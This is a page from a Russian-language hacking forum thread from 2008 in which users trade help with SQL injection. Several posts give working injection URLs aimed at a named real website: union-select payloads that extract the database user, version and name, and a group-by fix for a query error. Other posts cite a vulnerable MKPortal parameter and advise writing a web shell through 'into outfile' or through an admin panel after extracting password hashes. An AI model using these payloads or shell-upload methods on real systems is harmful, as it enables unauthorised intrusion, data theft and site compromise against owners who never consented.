Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    ВСем Прюэт!
    Есть такая уязвимость в MKportale 1.1:
    _http://www.securityfocus.com/archive/1/485035
    HTML:
    : Discovery by: 
    Sw33t h4cK3r    
    : POWERED BY
    : MKPortal M1.1 
    Exploit :
    http://Example.com
    index.php?ind=gallery&op=foto_show&ida=(sql) 
    Только я не понимаю,что дает это инъекция,никак не получаеться раскрутить...Прошу помощи :)
     
    #2761 DDoSька, 29 Jul 2008
    Last edited: 29 Jul 2008
  2. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    скачай исходники двига и помотри таблички и колонки )
     
  3. Андрюша

    Joined:
    24 Jul 2008
    Messages:
    9
    Likes Received:
    13
    Reputations:
    -10
    скуль инекцыя
     
  4. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Так это не проблема,только вот раскрутить не получаеться =(
     
  5. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2DDoSька так я не понял в чем заключаеться вопрос ? дай линк то хотя бы что можно в ПМ просто по описанию эт обычноая скуль иньекция ;)
    2Ershik там нету иньекции входяшие значения приводяться к integer о чем и говорит ошибка ;)
     
  6. Bonnie and Clyde

    Bonnie and Clyde New Member

    Joined:
    26 Jul 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    2
    там blin sql-inj

    http://milw0rm.com/exploits/4179
     
    #2766 Bonnie and Clyde, 29 Jul 2008
    Last edited: 29 Jul 2008
  7. s_p_a_m

    s_p_a_m Elder - Старейшина

    Joined:
    8 Feb 2008
    Messages:
    100
    Likes Received:
    58
    Reputations:
    4
    как залить шелл через скуль инжект? знаю путь где лежит сайт, с помощью подзапросов (substring((select+user())..... вывел чудесное слово Root, короче все это не важно, меня интересует как залить шелл через скулю ?
     
  8. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    s_p_a_m
    _https://forum.antichat.net/showthread.php?t=34338
     
  9. none222

    none222 Guest

    Reputations:
    0
    s_p_a_m
    если экранизируются ковыки, то скуль-запросами не зальёшь. Зато можешь поковырять скрипты, что стоят на сервере, вытянуть пароли из БД, расшифровать, если потребуется и через админку попробовать залить шелл ;-)
     
  10. s_p_a_m

    s_p_a_m Elder - Старейшина

    Joined:
    8 Feb 2008
    Messages:
    100
    Likes Received:
    58
    Reputations:
    4
    выводимых полей нет
     
  11. s_p_a_m

    s_p_a_m Elder - Старейшина

    Joined:
    8 Feb 2008
    Messages:
    100
    Likes Received:
    58
    Reputations:
    4
    каким образом вытянуть пароли ? выводимых полей нет? поделись знаниями, так как я такой скулей первый раз работаю :)
     
  12. none222

    none222 Guest

    Reputations:
    0
    зайди в раздел СТАТЬИ данного форума ;-)
     
  13. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    бред зачем выводимые поля при залитии шелла ??? тебе нужно знать имя хотя бы одной таблицы и установочную директорию если есть filepriv насколь я понял у тебя root тогда лей спокойно через into outfile !
     
  14. none222

    none222 Guest

    Reputations:
    0
    можно и не знать ни одного имени таблы и лить спокойно можно если ковычки не экранизируются
     
  15. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    Хм не чего не пойму )
    http://www.laptopshowcase.co.uk/downloads.php?id=1 and 1=1
    http://www.laptopshowcase.co.uk/downloads.php?id=1 and substring(version(),1,1)=4
    запросы такого рода проходят а что то типа
    http://www.laptopshowcase.co.uk/downloads.php?id=1 order by 1
    выдает ошибку типа:
    right syntax to use near 'GROUP BY downloads.id
    если завершить запрос "--" or "*/" то ошибка такого рода :
    "Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause"
    подскажите в чем проблема ?
     
  16. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    MaSTeR GэN
    http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+1/*
    http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+concat_ws(0x3a,user(),version(),database())/*

    вывод в title
     
    1 person likes this.
  17. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ладно поф с этим сайтом.А на лаптопы эти забей,их уже тыща человек ломала)
     
  18. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    очень странный ответ в MS Access:

    http://xxx.com/Detail.asp?ad_id=2968+order+by+1

    кто сталкивался с подобным и что это?
     
  19. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    вероятнее всего твой запрос проходит, а на следующем скул уже не прокатывает. И такой -- комментарий на будущее должен с обоих сторон обрамлятся пробелом +by+1+--+, хотя на некоторых серваках вроде и так пашет...
     
  20. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    В запросе используется одна из функций (MIN(),MAX(),COUNT().. При их использовании обязательна группировка по одному из полей, а ты обрезаешь завершающий групбай комментарием...

    http://www.laptopshowcase.co.uk/downloads.php?id=1+group+by+1/* вот так надо
     
    1 person likes this.
Thread Status:
Not open for further replies.